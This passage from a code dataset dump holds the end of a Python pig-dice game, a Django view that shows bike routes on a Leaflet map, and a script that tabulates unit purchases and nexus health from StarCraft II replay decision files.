0\r\n if shape1 == 'snout':\r\n pigRoll.score2 = 0\r\n else:\r\n pigRoll.score2 = 10\r\n snouter()\r\n rollP2 = 999\r\n if rollP2 < 101:\r\n print (\"Second Pig is a Leaning Jowler\")\r\n if rollP2dot == 1:\r\n pigRoll.spot = 1\r\n else:\r\n pigRoll.spot = 0\r\n if shape1 == 'lean':\r\n pigRoll.score2 = 0\r\n else:\r\n pigRoll.score2 = 15\r\n leaner()\r\n rollP2 = 999\r\n\r\n# MAIN\r\ninstructions() # Call to instructions\r\nplayer1 = input('Player 1 name: ') #User name input\r\nplayer2 = input('Player 2 name: ')\r\n\r\n\r\nwhile (playagain == 'y' or playagain == 'Y'): #Loop to repeat game play\r\n while (scoreP1 
< 100) and (scoreP2 < 100) and (turn != 'q' and turn !='Q'): #Loop to end game play based on score or quit request\r\n while (player == 1) and (scoreP1 < 100 ) and (scoreP2 < 100): #Loop for first player \r\n print (' ')\r\n print (player1, 'rolls the pigs')\r\n pigRoll() #Call to pig rolling function\r\n scoreP1 = (scoreP1 + (pigRoll.score1 + pigRoll.score2))\r\n if pigRoll.wipe == 1:\r\n scoreP1 = 0\r\n player = 2\r\n if scoreP1 >= 100:\r\n print (player1, ' WINS With A Score of ', scoreP1)\r\n print (player2, ' Comes in second with a score of ', scoreP2)\r\n else:\r\n print (' Your score is', scoreP1)\r\n print (' ')\r\n if pigRoll.passPig == 1:\r\n player = 2\r\n print (' Pigout! -no points and the roll passes to next player')\r\n pigRoll.passPig = 0\r\n if scoreP1 < 100 and pigRoll.wipe == 0 and player != 2:\r\n turn = input('Press p to pass the pigs, r to roll again and q to quit: ')\r\n if turn == 'q' or turn == 'Q':\r\n break\r\n elif turn == 'r' or turn == 'R':\r\n player = 1\r\n else:\r\n player = 2\r\n \r\n while (player == 2) and (scoreP1 < 100 ) and (scoreP2 < 100): #Loop for second player\r\n print (' ')\r\n print (player2, 'rolls the pigs')\r\n pigRoll()\r\n scoreP2 = (scoreP2 + (pigRoll.score1 + pigRoll.score2))\r\n if pigRoll.wipe == 1:\r\n scoreP2 = 0\r\n player = 1\r\n if scoreP2 >= 100:\r\n print (player2, ' WINS With A Score of ', scoreP2)\r\n print (player1, ' Comes in second with a score of ', scoreP1)\r\n else:\r\n print (' Your score is', scoreP2)\r\n print (' ')\r\n if pigRoll.passPig == 1:\r\n player = 1\r\n print (' Pigout! -no points and the roll passes to next player')\r\n pigRoll.passPig = 0\r\n if scoreP2 < 100 and pigRoll.wipe == 0 and player != 1:\r\n turn = input('Press p to pass the pigs, r to roll again and q to quit: ')\r\n if turn == 'q' or turn == 'Q':\r\n break\r\n elif turn == 'r' or turn == 'R':\r\n player = 2\r\n else:\r\n player = 1\r\n \r\n #Closing out of game\r\n print (' ')\r\n print ('Final Score:')\r\n print (player1, ': ', scoreP1)\r\n print (player2, ': ', scoreP2)\r\n print ('Good game! Pay up all bets.')\r\n print (' ')\r\n turn = 'r'\r\n player = 1\r\n scoreP1 = 0\r\n scoreP2 = 0\r\n playagain = input('Want to play again? y or n: ')\r\n\r\nprint (' ') \r\nprint ('Thank you! 
Yall Come back now ya hear!')\r\n#end\r\n","sub_path":"Pig_Out.py","file_name":"Pig_Out.py","file_ext":"py","file_size_in_byte":14908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"244688779","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.template import loader\nfrom .models import BikeRoute\nfrom django.shortcuts import get_object_or_404\nimport json\n\ndef route_view(request, pk=None):\n \"\"\" Main view using Leaflet map in the template, allows for simple route selection\"\"\"\n polyline = [[[]]]\n all_routes = BikeRoute.objects.all() # list of routes used for selection\n if pk:\n bike_route = get_object_or_404(all_routes, pk=pk)\n polyline = bike_route.polyline\n polyline = json.loads(polyline) # convert string to a list\n\n template = loader.get_template('route/map.html')\n context = {\n 'routes': all_routes,\n 'polyline': polyline,\n 'zoom': polyline[0][0][::-1] # reverse coords for map.setView\n }\n return HttpResponse(template.render(context, request))\n\n","sub_path":"route/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"167356720","text":"import os\nimport utils\nimport json\nimport tree_utils\n\ndef show_activity_in_replays(trees_dir):\n dirs = os.listdir(trees_dir)\n for dir in dirs:\n if \"game_\" in dir:\n game_dir_path = os.path.join(trees_dir, dir)\n parts = os.path.split(dir)\n replay_name = parts[1]\n print(\"\")\n show_activity_via_trees(replay_name, game_dir_path)\n\ndef show_activity_via_trees(replay_name,game_dir_path):\n files = os.listdir(game_dir_path)\n files = utils.rename_files_to_ensure_consistent_digits(files)\n fnames_etc = utils.get_json_tree_filenames_etc(game_dir_path)\n print(\"\")\n dp_infos = []\n #for i in range(len(files) - 7, len(files)):\n for fname_etc in fnames_etc:\n dp_info = get_dp_info(fname_etc.path)\n dp_infos.append(dp_info)\n deduce_enemy_actions(dp_infos)\n log_agent_story(dp_infos)\n # note_misspent_units(dp_infos)\n replay_json_info = get_info_from_replay_json(get_path_for_replay_json(replay_name, game_dir_path))\n express_infos(dp_infos, replay_name, replay_json_info)\n\ndef get_path_for_replay_json(replay_name, game_dir_path):\n trees_dir = os.path.dirname(game_dir_path)\n osu_xai_sc2ui_dir = os.path.dirname(trees_dir)\n replays_dir = os.path.join(osu_xai_sc2ui_dir,\"replays\")\n replays_game_dir= os.path.join(replays_dir,replay_name)\n replay_filename = replay_name + \".json\"\n replay_path = os.path.join(replays_game_dir, replay_filename)\n print(\"derived replay json pathname as \" + replay_path)\n return replay_path\n\n\ndef center(w, s):\n if len(s) >= w:\n return s\n else:\n diff = w - len(s)\n half_diff = int(diff / 2)\n for i in range(half_diff):\n s = \" \" + s\n return s\n\n#\t Agent Top--------------|Enemy Top------------------|Agent Enemy Agent Bottom Enemy Bottom\n# M,B,I + \t NEX NEX M,B,I + \n#DP01 4,0,0 1 - - 100 : 100 0,1,0 - - - \n#DP02 5,0,0 - - - : 3 - - \n#DP03 - - - 97 : 3,1,0 1 - -\n#DP04 - 1 - : 4,1,0 - - 1\n#DP05 5,1,0 - 1 - : \n#DP06 5,2,0 1 - - : \n#DP07 6,2,0 - - - 95 : \n\nfr_top_has_keys = [\"friendly.has.baneling.top\", \"friendly.has.marine.top\", \"friendly.has.immortal.top\"]\nfr_bot_has_keys = [\"friendly.has.baneling.bottom\",\"friendly.has.marine.bottom\",\"friendly.has.immortal.bottom\"]\n\nfr_top_buys_keys = [\"friendly.buys.baneling.top\", 
\"friendly.buys.marine.top\", \"friendly.buys.immortal.top\"]\nfr_bot_buys_keys = [\"friendly.buys.baneling.bottom\",\"friendly.buys.marine.bottom\",\"friendly.buys.immortal.bottom\"]\n\nen_top_has_keys = [\"enemy.has.baneling.top\", \"enemy.has.marine.top\", \"enemy.has.immortal.top\"]\nen_bot_has_keys = [\"enemy.has.baneling.bottom\",\"enemy.has.marine.bottom\",\"enemy.has.immortal.bottom\"]\n\nen_top_buys_keys = [\"enemy.buys.baneling.top\", \"enemy.buys.marine.top\", \"enemy.buys.immortal.top\"]\nen_bot_buys_keys = [\"enemy.buys.baneling.bottom\",\"enemy.buys.marine.bottom\",\"enemy.buys.immortal.bottom\"]\nstory_col_width = 10\n\n# keys\n# fth : friendly top has\n# ftb : friendly top buys\n# fbh : friendly bot has\n# fbb : friendly bot buys\n# fph : friendly pyl has\n# fpb : friendly pyl buys\n# \n# eth : enemy top has\n# etb : enemy top buys\n# ebh : enemy bot has\n# ebb : enemy bot buys\n# eph : enemy pyl has\n# epb : enemy pyl buys\n# \n# ftn : friendly top nexus\n# fbn : friendly bot nexus\n# etn : enemy top nexus\n# ebn : enemy bot nexus\n\nplayer_hdrs = {}\nplayer_hdrs[\"col_dp\"] = \" \"\nplayer_hdrs[\"col_fth\"] = \"Agent\"\nplayer_hdrs[\"col_ftb\"] = \"Agent\"\nplayer_hdrs[\"col_fbh\"] = \"Agent\"\nplayer_hdrs[\"col_fbb\"] = \"Agent\"\nplayer_hdrs[\"col_fph\"] = \"Agent\"\nplayer_hdrs[\"col_fpb\"] = \"Agent\"\nplayer_hdrs[\"col_eph\"] = \"Enemy\"\nplayer_hdrs[\"col_epb\"] = \"Enemy\"\nplayer_hdrs[\"col_eth\"] = \"Enemy\"\nplayer_hdrs[\"col_etb\"] = \"Enemy\"\nplayer_hdrs[\"col_ebh\"] = \"Enemy\"\nplayer_hdrs[\"col_ebb\"] = \"Enemy\"\n\nplayer_hdrs[\"col_ftn\"] = \"Agent\"\nplayer_hdrs[\"col_fbn\"] = \"Agent\"\nplayer_hdrs[\"col_etn\"] = \"Enemy\"\nplayer_hdrs[\"col_ebn\"] = \"Enemy\"\nplayer_hdrs[\"fr_mineral\"] = \"Agent\"\n\nplayer_hdrs[\"agent_story\"] = center(story_col_width,\"Agent\")\n\nlane_hdrs = {}\nlane_hdrs[\"col_dp\"] = \" \"\nlane_hdrs[\"col_fth\"] = \" T \"\nlane_hdrs[\"col_ftb\"] = \" T \"\nlane_hdrs[\"col_fbh\"] = \" B \"\nlane_hdrs[\"col_fbb\"] = \" B \"\nlane_hdrs[\"col_fph\"] = \" PYL\"\nlane_hdrs[\"col_fpb\"] = \" PYL\"\nlane_hdrs[\"col_eph\"] = \" PYL\"\nlane_hdrs[\"col_epb\"] = \" PYL\"\nlane_hdrs[\"col_eth\"] = \" T \"\nlane_hdrs[\"col_etb\"] = \" T \"\nlane_hdrs[\"col_ebh\"] = \" B \"\nlane_hdrs[\"col_ebb\"] = \" B \"\n\nlane_hdrs[\"col_ftn\"] = \" T \"\nlane_hdrs[\"col_fbn\"] = \" B \"\nlane_hdrs[\"col_etn\"] = \" T \"\nlane_hdrs[\"col_ebn\"] = \" B \"\n\nlane_hdrs[\"agent_story\"] = center(story_col_width,\"story\")\nlane_hdrs[\"fr_mineral\"] = \"Min-\"\n\n\ntype_hdrs = {}\ntype_hdrs[\"col_dp\"] = \" \"\ntype_hdrs[\"col_fth\"] = \" has\"\ntype_hdrs[\"col_ftb\"] = \"buys\"\ntype_hdrs[\"col_fbh\"] = \" has\"\ntype_hdrs[\"col_fbb\"] = \"buys\"\ntype_hdrs[\"col_fph\"] = \" has\"\ntype_hdrs[\"col_fpb\"] = \"buys\"\ntype_hdrs[\"col_eph\"] = \" has\"\ntype_hdrs[\"col_epb\"] = \"buys\"\ntype_hdrs[\"col_eth\"] = \" has\"\ntype_hdrs[\"col_etb\"] = \"buys\"\ntype_hdrs[\"col_ebh\"] = \" has\"\ntype_hdrs[\"col_ebb\"] = \"buys\"\n\ntype_hdrs[\"col_ftn\"] = \" nex \"\ntype_hdrs[\"col_fbn\"] = \" nex \"\ntype_hdrs[\"col_etn\"] = \" nex \"\ntype_hdrs[\"col_ebn\"] = \" nex \"\ntype_hdrs[\"agent_story\"] = \" \"\ntype_hdrs[\"fr_mineral\"] = \"eral\"\n\ncol_order = [\"col_dp\", # DP\n \"fr_mineral\", #friendly mineral\n \"agent_story\", # agent story\n \"col_fpb\", # friendly pylon buys\n \"col_fph\", # friendly pylon has\n\n \"col_fth\", # friendly top has \n \"col_ftb\", # friendly top buys \n \"col_etn\", # enemy top nexus\n\n \"col_fbh\", # friendly bot has \n 
\"col_fbb\", # friendly bot buys\n \"col_ebn\", # enemy bot nexus\n\n \"col_eph\", # enemy pylon has \n \"col_epb\", # enemy pylon buys \n\n \"col_eth\", # enemy top has \n \"col_etb\", # enemy top buys \n \"col_ftn\", # friendly top nexus\n\n \"col_ebh\", # enemy bot has \n \"col_ebb\", # enemy bot buys\n \"col_fbn\"] # friendly bot nexus\n \n\n# fph - friendly pylon has\n# fpb - friendly pylon buys\n\ndef express_infos(dp_infos, replay_name, replay_json_info):\n print(\"\")\n col_vals_for_dp = {}\n for i in range(len(dp_infos)):\n #col_dp = \"DP\" + utils.ensure_two_digits(i + 28) + \" \"\n col_dp = \"DP\" + utils.ensure_two_digits(i) + \" \"\n di = dp_infos[i]\n col_fth = get_has_column (di, fr_top_has_keys)\n col_ftb = get_buys_column(di, fr_top_buys_keys)\n\n col_fbh = get_has_column (di, fr_bot_has_keys)\n col_fbb = get_buys_column(di, fr_bot_buys_keys)\n\n col_eth = get_has_column (di, en_top_has_keys)\n col_etb = get_buys_column(di, en_top_buys_keys)\n\n col_ebh = get_has_column (di, en_bot_has_keys)\n col_ebb = get_buys_column(di, en_bot_buys_keys)\n\n col_fph = get_pylon_has_value(int(di[\"friendly.has.pylon\"]))\n col_fpb = get_pylon_action_string(di[\"friendly.buys.pylon\"])\n col_eph = get_pylon_has_value(int(di[\"enemy.has.pylon\"]))\n col_epb = get_pylon_action_string(di[\"enemy.buys.pylon\"])\n\n col_vals = {}\n col_vals[\"col_dp\"] = col_dp\n #friendly\n col_vals[\"col_fth\"] = col_fth\n col_vals[\"col_ftb\"] = col_ftb\n col_vals[\"col_fbh\"] = col_fbh\n col_vals[\"col_fbb\"] = col_fbb\n #enemy\n col_vals[\"col_eth\"] = col_eth\n col_vals[\"col_etb\"] = col_etb\n col_vals[\"col_ebh\"] = col_ebh\n col_vals[\"col_ebb\"] = col_ebb\n #friendly pylons\n col_vals[\"col_fph\"] = col_fph\n col_vals[\"col_fpb\"] = col_fpb\n #enemy_pylons\n col_vals[\"col_eph\"] = col_eph\n col_vals[\"col_epb\"] = col_epb\n\n # nexi\n col_vals[\"col_ftn\"] = pad_to_width(6,get_percent_health(di[\"friendly.top.nexus\"]))\n col_vals[\"col_fbn\"] = pad_to_width(6,get_percent_health(di[\"friendly.bot.nexus\"]))\n col_vals[\"col_etn\"] = pad_to_width(6,get_percent_health(di[\"enemy.top.nexus\"]))\n col_vals[\"col_ebn\"] = pad_to_width(6,get_percent_health(di[\"enemy.bot.nexus\"]))\n\n # agent story\n col_vals[\"agent_story\"] = center(story_col_width, di[\"agent_story\"] )\n col_vals[\"fr_mineral\"] = pad_to_width(6,str(int(di[\"unspent_mineral\"])))\n col_vals_for_dp[i] = col_vals\n \n max_width_col_vals = get_max_width_col_vals(col_vals_for_dp, len(dp_infos))\n print(\"\")\n print(\"replay name : \" + replay_name + \" unit sequence: b,m,i\")\n print(\"\")\n print_row(max_width_col_vals,player_hdrs)\n print_row(max_width_col_vals,lane_hdrs)\n print_row(max_width_col_vals,type_hdrs)\n print(\"\")\n for i in range(len(dp_infos)):\n col_vals = col_vals_for_dp[i]\n print_row(max_width_col_vals,col_vals)\n \n # print the final nexus scores\n final_col_vals = {}\n for col_key in col_order:\n final_col_vals[col_key] = \" \"\n\n final_col_vals[\"col_ftn\"] = pad_to_width(6,get_percent_health(replay_json_info[\"friendly.nexusHealth.top_final\"]))\n final_col_vals[\"col_fbn\"] = pad_to_width(6,get_percent_health(replay_json_info[\"friendly.nexusHealth.bottom_final\"]))\n final_col_vals[\"col_etn\"] = pad_to_width(6,get_percent_health(replay_json_info[\"enemy.nexusHealth.top_final\"]))\n final_col_vals[\"col_ebn\"] = pad_to_width(6,get_percent_health(replay_json_info[\"enemy.nexusHealth.bottom_final\"]))\n\n print_row(max_width_col_vals, final_col_vals)\n\n\n\ndef get_percent_health(val):\n percent = int((val * 
100) / 2000)\n percent_str = str(percent)\n for i in range(3 - len(percent_str)):\n percent_str = \" \" + percent_str\n return percent_str\n\ndef get_max_width_col_vals(col_vals_for_dp, dp_count):\n max_width_col_vals = {}\n for col_key in col_order:\n max_width_col_vals[col_key] = \"\"\n for i in range(dp_count):\n col_vals = col_vals_for_dp[i]\n for col_key in col_order:\n if len(col_vals[col_key]) > len(max_width_col_vals[col_key]):\n max_width_col_vals[col_key] = col_vals[col_key]\n return max_width_col_vals\n\ndef get_pylon_has_value(count):\n result = \" \"\n if count == 0:\n return result\n for i in range(count):\n result= result + \"P\"\n return pad_to_width(6,result)\n\ndef print_row(col_vals,col_data):\n line = \"\"\n for col_key in col_order:\n header_entry = pad_to_width(len(col_vals[col_key]),col_data[col_key])\n line = line + header_entry\n print(line)\n\ndef pad_to_width(w,s):\n while len(s) < w:\n s = s +\" \"\n return s\n\ndef get_has_column(di, keys):\n return str(int(di[keys[0]]))+\",\" + str(int(di[keys[1]]))+ \",\" + str(int(di[keys[2]])) + \" \"\n\ndef get_buys_column(di, keys):\n return get_action_string(di[keys[0]],di[keys[1]],di[keys[2]]) + \" \"\n\ndef get_pylon_action_string(a):\n if a == \"?\":\n return pad_to_width(6,\" ?\")\n else:\n result = \" \"\n if a > 0:\n count = int(a)\n for i in range(count):\n result = result + \"P\"\n return pad_to_width(6,result)\n\ndef get_action_string(a,b,c):\n if a == \"?\":\n return \"?,?,?\"\n a_str = \"-\"\n b_str = \"-\"\n c_str = \"-\"\n if a > 0:\n a_str = str(int(a))\n if b > 0:\n b_str = str(int(b))\n if c > 0:\n c_str = str(int(c))\n return a_str + \" \" + b_str + \" \" + c_str\n\n#B -> M -> I\n#\n# top: b12+4 -> m22 ; m22+3 -> \n#\n# rps_story[\"marine->immortal\"\n# rps_target[\"immortal\"] = \"baneling\"\n# rps_target[\"baneling\"] = \"marine\"\n\n\n# rps_vulnerable_to[\"marine\"] = \"baneling\"\n# rps_vulnerable_to[\"immortal\"] = \"marine\"\n# rps_vulnerable_to[\"baneling\"] = \"immortal\"\n\n# def note_misspent_units(dp_infos):\n# note_misspent_unit(dp_infos,\"marine\",\"top\")\n\n\n# def note_rps_counters(dp_infos,type,lane):\n# for di in dp_infos:\n\n\n\n\n\ndef log_agent_story(dp_infos):\n for di in dp_infos:\n mt = di[\"friendly.buys.marine.top\"] \n bt = di[\"friendly.buys.baneling.top\"] \n it = di[\"friendly.buys.immortal.top\"] \n mb = di[\"friendly.buys.marine.bottom\"] \n bb = di[\"friendly.buys.baneling.bottom\"] \n ib = di[\"friendly.buys.immortal.bottom\"]\n pylons = di[\"friendly.buys.pylon\"]\n total_units_bought = mt + bt + it + mb + bb +ib\n if total_units_bought == 0 and pylons == 0:\n di[\"agent_story\"] = \"save\"\n else:\n lane = get_lane_for_action(mt,bt,it,mb,bb,ib)\n action = get_action_string_from_friendly_buys(lane,mt,bt,it,mb,bb,ib)\n story = lane + \" \" + action\n di[\"agent_story\"] = story\n \ndef get_action_string_from_friendly_buys(lane,mt,bt,it,mb,bb,ib):\n if lane == \" \":\n return \"-,-,-\"\n elif lane == \"T \":\n return str(int(bt)) + \",\" + str(int(mt)) + \",\" + str(int(it))\n else: \n return str(int(bb)) + \",\" + str(int(mb)) + \",\" + str(int(ib))\n\n\ndef get_lane_for_action(mt,bt,it,mb,bb,ib):\n top_count = mt + bt + it\n bot_count = mb + bb + ib\n if (top_count == 0 and bot_count == 0):\n return \" \"\n if(top_count > 0):\n return \"T \"\n else:\n return \" B\"\n\ndef deduce_enemy_actions(dp_infos):\n for i in range(len(dp_infos)-1):\n cur = dp_infos[i]\n next = dp_infos[i+1]\n enemy_buys_marine_top = next[\"enemy.has.marine.top\"] - cur[\"enemy.has.marine.top\"]\n 
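# enemy purchases are never logged directly, so each delta is inferred from the change in 'has' counts between consecutive decision points\n 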
enemy_buys_baneling_top = next[\"enemy.has.baneling.top\"] - cur[\"enemy.has.baneling.top\"]\n enemy_buys_immortal_top = next[\"enemy.has.immortal.top\"] - cur[\"enemy.has.immortal.top\"]\n enemy_buys_marine_bottom = next[\"enemy.has.marine.bottom\"] - cur[\"enemy.has.marine.bottom\"]\n enemy_buys_baneling_bottom = next[\"enemy.has.baneling.bottom\"] - cur[\"enemy.has.baneling.bottom\"]\n enemy_buys_immortal_bottom = next[\"enemy.has.immortal.bottom\"] - cur[\"enemy.has.immortal.bottom\"]\n enemy_buys_pylon = next[\"enemy.has.pylon\"] - cur[\"enemy.has.pylon\"]\n cur[\"enemy.buys.marine.top\"] = enemy_buys_marine_top\n cur[\"enemy.buys.baneling.top\"] = enemy_buys_baneling_top\n cur[\"enemy.buys.immortal.top\"] = enemy_buys_immortal_top\n cur[\"enemy.buys.marine.bottom\"] = enemy_buys_marine_bottom\n cur[\"enemy.buys.baneling.bottom\"] = enemy_buys_baneling_bottom\n cur[\"enemy.buys.immortal.bottom\"] = enemy_buys_immortal_bottom\n cur[\"enemy.buys.pylon\"] = enemy_buys_pylon\n \n next[\"enemy.buys.marine.top\"] = \"?\"\n next[\"enemy.buys.baneling.top\"] = \"?\"\n next[\"enemy.buys.immortal.top\"] = \"?\"\n next[\"enemy.buys.marine.bottom\"] = \"?\"\n next[\"enemy.buys.baneling.bottom\"] = \"?\"\n next[\"enemy.buys.immortal.bottom\"] = \"?\"\n next[\"enemy.buys.pylon\"] = \"?\"\n\ndef get_dp_info(path):\n with open(path) as json_file:\n root = json.load(json_file)\n print(\".\" , end = '', flush = True)\n info = {}\n state = root[\"state\"] \n info[\"unspent_mineral\"] = state[0] \n info[\"friendly.has.marine.top\"] = state[1]\n info[\"friendly.has.baneling.top\"] = state[2]\n info[\"friendly.has.immortal.top\"] = state[3]\n info[\"friendly.has.marine.bottom\"] = state[4]\n info[\"friendly.has.baneling.bottom\"] = state[5]\n info[\"friendly.has.immortal.bottom\"] = state[6]\n\n info[\"enemy.has.marine.top\"] = state[8]\n info[\"enemy.has.baneling.top\"] = state[9]\n info[\"enemy.has.immortal.top\"] = state[10]\n info[\"enemy.has.marine.bottom\"] = state[11]\n info[\"enemy.has.baneling.bottom\"] = state[12]\n info[\"enemy.has.immortal.bottom\"] = state[13]\n\n info[\"friendly.has.pylon\"] = state[7]\n info[\"enemy.has.pylon\"] = state[14]\n\n info[\"friendly.top.nexus\"] = state[63]\n info[\"friendly.bot.nexus\"] = state[64]\n info[\"enemy.top.nexus\"] = state[65]\n info[\"enemy.bot.nexus\"] = state[66]\n\n friendly_action = tree_utils.get_chosen_action(root)\n action = friendly_action[\"action\"]\n info[\"friendly.buys.marine.top\"] = action[0]\n info[\"friendly.buys.baneling.top\"] = action[1]\n info[\"friendly.buys.immortal.top\"] = action[2]\n info[\"friendly.buys.marine.bottom\"] = action[3]\n info[\"friendly.buys.baneling.bottom\"] = action[4]\n info[\"friendly.buys.immortal.bottom\"] = action[5]\n info[\"friendly.buys.pylon\"] = action[6]\n \n #prime the agent story bin\n info[\"agent_story\"] = \"\"\n return info\n\n\n\n\n\n\ndef get_info_from_replay_json(replay_json_path):\n info = {}\n with open(replay_json_path) as json_file:\n frame_infos = json.load(json_file)\n frame = {}\n for frame in frame_infos:\n pass\n nexus_units = get_nexus_units(frame)\n info[\"friendly.nexusHealth.top_final\"] = get_nexus_health_for_unit(1,\"top\",nexus_units)\n info[\"friendly.nexusHealth.bottom_final\"] = get_nexus_health_for_unit(1,\"bottom\",nexus_units)\n info[\"enemy.nexusHealth.top_final\"] = get_nexus_health_for_unit(4,\"top\",nexus_units)\n info[\"enemy.nexusHealth.bottom_final\"] = get_nexus_health_for_unit(4,\"bottom\",nexus_units)\n return info\n \n\n\ndef get_nexus_units(frameInfo):\n 
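# unit_type 59 identifies a Nexus structure in these replay dumps\n 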
nexus_unit = 59\n nexus_units = []\n for unit in frameInfo[\"units\"]:\n if unit[\"unit_type\"] == nexus_unit:\n nexus_units.append(unit)\n return nexus_units\n\n\ndef get_nexus_health_for_unit(alliance, lane, nexusUnits):\n for unit in nexusUnits:\n cur_lane = get_unit_lane(unit[\"y\"])\n cur_alliance = unit[\"alliance\"]\n if alliance == cur_alliance and cur_lane == lane:\n return unit[\"health\"]\n return 0\n\n\n\ndef get_unit_lane(unit_y_pos):\n lane = \"bottom\"\n if (unit_y_pos > 32):\n lane = \"top\"\n return lane\n\n\n\n\n\n\n\n# dp_frames = []\n\n# def show_activity_via_replay_json(replay_json_path):\n# with open(replay_json_path) as json_file:\n# frame_infos = json.load(json_file)\n# set_dp_frames(frame_infos)\n# add_wave_triggered_to_frames(frame_infos)\n# add_unit_counts_to_frames(frame_infos)\n# add_unit_deltas_to_frames(frame_infos)\n\n\n\n\n# unit_info_keys = [\n# \"friendly.marineBuilding.top\",\n# \"friendly.banelingBuilding.top\",\n# \"friendly.immortalBuilding.top\",\n# \"friendly.marineBuilding.bottom\",\n# \"friendly.banelingBuilding.bottom\",\n# \"friendly.immortalBuilding.bottom\",\n# \"enemy.marineBuilding.top\",\n# \"enemy.banelingBuilding.top\",\n# \"enemy.immortalBuilding.top\",\n# \"enemy.marineBuilding.bottom\",\n# \"enemy.banelingBuilding.bottom\",\n# \"enemy.immortalBuilding.bottom\",\n# \"friendly.Pylon\",\n# \"enemy.Pylon\"\n# ]\n\n# unit_id_for_key = {}\n# unit_id_for_key[\"friendly.marineBuilding.top\"] = 21\n# unit_id_for_key[\"friendly.banelingBuilding.top\"] = 28\n# unit_id_for_key[\"friendly.immortalBuilding.top\"] = 70\n# unit_id_for_key[\"friendly.marineBuilding.bottom\"] = 21\n# unit_id_for_key[\"friendly.banelingBuilding.bottom\"] = 28\n# unit_id_for_key[\"friendly.immortalBuilding.bottom\"] = 70\n# unit_id_for_key[\"enemy.marineBuilding.top\"] = 21\n# unit_id_for_key[\"enemy.banelingBuilding.top\"] = 28\n# unit_id_for_key[\"enemy.immortalBuilding.top\"] = 70\n# unit_id_for_key[\"enemy.marineBuilding.bottom\"] = 21\n# unit_id_for_key[\"enemy.banelingBuilding.bottom\"] = 28\n# unit_id_for_key[\"enemy.immortalBuilding.bottom\"] = 70\n# unit_id_for_key[\"friendly.Pylon\"] = 60\n# unit_id_for_key[\"enemy.Pylon\"] = 60\n\n\n# alliance_for_key = {}\n# alliance_for_key[\"friendly.marineBuilding.top\"] = 1\n# alliance_for_key[\"friendly.banelingBuilding.top\"] = 1\n# alliance_for_key[\"friendly.immortalBuilding.top\"] = 1\n# alliance_for_key[\"friendly.marineBuilding.bottom\"] = 1\n# alliance_for_key[\"friendly.banelingBuilding.bottom\"] = 1\n# alliance_for_key[\"friendly.immortalBuilding.bottom\"] = 1\n# alliance_for_key[\"enemy.marineBuilding.top\"] = 4\n# alliance_for_key[\"enemy.banelingBuilding.top\"] = 4\n# alliance_for_key[\"enemy.immortalBuilding.top\"] = 4\n# alliance_for_key[\"enemy.marineBuilding.bottom\"] = 4\n# alliance_for_key[\"enemy.banelingBuilding.bottom\"] = 4\n# alliance_for_key[\"enemy.immortalBuilding.bottom\"] = 4\n# alliance_for_key[\"friendly.Pylon\"] = 1\n# alliance_for_key[\"enemy.Pylon\"] = 4\n\n\n# lane_for_key = {}\n# lane_for_key[\"friendly.marineBuilding.top\"] = \"top\"\n# lane_for_key[\"friendly.banelingBuilding.top\"] = \"top\"\n# lane_for_key[\"friendly.immortalBuilding.top\"] = \"top\"\n# lane_for_key[\"friendly.marineBuilding.bottom\"] = \"bottom\"\n# lane_for_key[\"friendly.banelingBuilding.bottom\"] = \"bottom\"\n# lane_for_key[\"friendly.immortalBuilding.bottom\"] = \"bottom\"\n# lane_for_key[\"enemy.marineBuilding.top\"] = \"top\"\n# lane_for_key[\"enemy.banelingBuilding.top\"] = \"top\"\n# 
lane_for_key[\"enemy.immortalBuilding.top\"] = \"top\"\n# lane_for_key[\"enemy.marineBuilding.bottom\"] = \"bottom\"\n# lane_for_key[\"enemy.banelingBuilding.bottom\"] = \"bottom\"\n# lane_for_key[\"enemy.immortalBuilding.bottom\"] = \"bottom\"\n# lane_for_key[\"friendly.Pylon\"] = \"\" #NA\n# lane_for_key[\"enemy.Pylon\"] = \"\" #NA\n\n\n# def add_unit_counts_to_frames(frame_infos):\n# prev_wave_counts = {}\n# prev_frame = {}\n# for key in unit_info_keys:\n# print(\"add_unit_counts ... key \" + key)\n# count_key = key +\"_count\"\n# at_first_frame_to_skip = True\n# for frame in frame_infos:\n# if at_first_frame_to_skip:\n# at_first_frame_to_skip = False\n# prev_frame = frame\n# continue\n# frame[count_key] = 0\n# unit_id = unit_id_for_key[key]\n# print(\"...frame \" + str(frame[\"frame_number\"]) + \" unit id \" + str(unit_id) + \"... key \" + key)\n# lane = lane_for_key[key]\n# alliance = alliance_for_key[key]\n# units = frame[\"units\"]\n# for unit in units:\n# cur_unit_id = unit[\"unit_type\"]\n# if cur_unit_id == 45: # skip the sensor unit types\n# continue\n# cur_alliance = unit[\"alliance\"]\n# if cur_unit_id == 60:\n# cur_lane = \"NA\"\n# else:\n# cur_lane = get_unit_lane(unit[\"y\"])\n# if cur_unit_id == unit_id and cur_alliance == alliance:\n# if cur_lane == \"NA\" or cur_lane == lane:\n# if cur_alliance == 4 and frame[\"wave_triggered\"] == 1 and prev_frame[\"wave_triggered\"] == 0:\n# if count_key in prev_frame:\n# prev_wave_counts[count_key] = prev_frame[count_key]\n# else:\n# prev_frame[count_key] = 0\n# prev_wave_counts[count_key] = prev_frame[count_key]\n# if prev_wave_counts != -1:\n# frame[count_key] = prev_wave_counts[count_key]\n# else:\n# frame[count_key] += 1\n# prev_frame[count_key] = frame[count_key]\n\n# def add_unit_deltas_to_frames(frame_infos):\n# delta_key_counters = {}\n# for key in unit_info_keys:\n# looking_at_first_frame = True\n# prev_frame = {} # make empty one so VS code doesn't complain about use before assignment\n# count_key = key +\"_count\"\n# delta_key = key + \"_delta\"\n# delta_counter_key = key + \"_delta_count\"\n# for frame in frame_infos:\n# frame[delta_key] = 0\n# frame[delta_key + \"_triggered\"] = 0\n\n# if not looking_at_first_frame:\n# if prev_frame[count_key] < frame[count_key]:\n# frame[delta_key] = frame[count_key] - prev_frame[count_key]\n# frame[delta_key + \"_triggered\"] = 1\n# delta_key_counters[delta_counter_key] = 1\n# else :\n# # no difference between frames\n# cur_count = delta_key_counters[delta_counter_key]\n# if cur_count == -1:\n# delta_key_counters[delta_counter_key] = 0\n# frame[delta_key + \"_triggered\"] = 0\n# elif cur_count != 0:\n# cur_count += 1\n# # console.log(key + \" frame \" + frameIndex + \" curCount \" + curCount)\n# if cur_count > 85: # chose 90 to be far enough past 